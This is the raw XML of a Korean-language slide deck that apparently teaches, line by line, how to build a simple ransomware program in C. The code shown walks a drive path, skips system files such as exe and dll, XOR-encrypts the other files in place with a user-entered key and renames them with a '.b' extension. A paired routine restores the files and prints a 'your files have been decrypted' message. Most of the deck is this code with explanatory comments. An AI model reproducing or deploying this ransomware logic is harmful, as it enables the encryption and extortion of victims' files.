                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>키값을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 프로그램으로 넘겨준다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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66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-#2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11F62-2F45-4D46-8820-6EB7C34D61DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4108174" y="1097407"/>
            <a:ext cx="80838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int main() {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("key:");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scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("%s", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the_key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>
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>복호화 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>키값을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 출력해줌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EncryptKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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char path[100] = "F:/";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GetfileList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(path);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   // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>복호화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puts("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>당신의 파일들이 모두 복호화 되었습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!");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   // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>복호화되었다고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 출력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system("pause&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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   // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>일시정지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return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-#2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#2-1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확장자명 바꾸기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91536-5514-400C-B643-81DCF5224B02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4055165" y="728076"/>
            <a:ext cx="79778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int encrypt(char *filename, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filepath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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확장자명 변경 함수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".exe") != 0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dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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dat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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ocx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>")) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// exe, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ocx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일이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findfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(filename);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파일을 탐색하는 함수 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</a:rPr>
              <a:t>return -1;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char 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[1000], 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[1000];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en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fullname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>은 원래 확장명 변수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, newname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>은 바꿀 확장자명 변수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sprintf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, "%s/%s", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filepath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, filename);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확장자를 바꾸려는 파일이 있는 경로와 파일이름을 저장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".") != NULL){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확장자를 바꾸려는 파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이 있는 경우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sprintf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, "%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s.b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>", 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en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filenewname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 확장자명을 바꿀 확장자를 저장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</a:rPr>
              <a:t>rename(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원래 기존 확장자를 바꿀 확장자명으로 바꾸는 함수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else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sprintf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, "%s", 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파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이 없으면 원래 파일이름을 저장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char data[1024];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unsigned int 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파일 사이즈를 저장하는 변수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long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>frpos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fwpos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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파일 위치를 저장하는 변수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FILE *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fopen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, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r+b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");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en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18360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-#2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#2-1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확장자명 바꾸기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91536-5514-400C-B643-81DCF5224B02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3935896" y="654610"/>
            <a:ext cx="8256104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 if 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 == NULL){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en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filenewname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이면 다시 파일을 찾는 함수를 실행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</a:rPr>
              <a:t>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".") == 0)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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>findfile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return -1;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}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while (!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>feof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)){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en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>가 끝이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>아닐때까지</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050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fwpos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ftell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현재 파일에 현재 위치를 저장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fread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(data, 1, 1024, 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>
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 읽고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>사이즈를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>만큼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 기록한 것을 저장 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>갯수를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 저장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if (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 == 0)break; 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for (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 = 0; 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&lt;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; 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++){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data[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] ^= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[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 % 10];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}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frpos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ftell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fseek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fwpos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, SEEK_SET);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en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fseek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 파일의 읽기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>쓰기 위치이동 함수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 파일시작 부터 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fwpos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>만큼 건너뛰는 함수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fwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(data, 1, 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>
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>크기를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>read_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>만큼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 기록 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>갯수를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 기록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fseek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frpos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, SEEK_SET);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fclose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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("%s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>암호화 완료</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.\n", 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return 1;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}</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="15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08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-#2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#2-2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확장자명 바꾸기</a:t>
            </a:r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19D00-513E-4C70-8EF6-11186A787506}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3949148" y="728076"/>
            <a:ext cx="80838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char* aa(char string[]) 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int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>string_length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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while (string[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>string_length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]) ++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>string_length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string[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>string_length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - 1]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string[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>string_length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - 2] = 0;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return string;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// string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이 들어오면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 형식은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// C:\test\mymp3\a.mp3.b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>형식으로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>
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>되어있을 것이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>그것에서 마지막 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>".b"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 지우는 함수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int encrypt(char *filename, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filepath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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filefullname</a:t>
            </a:r>
            <a:r>
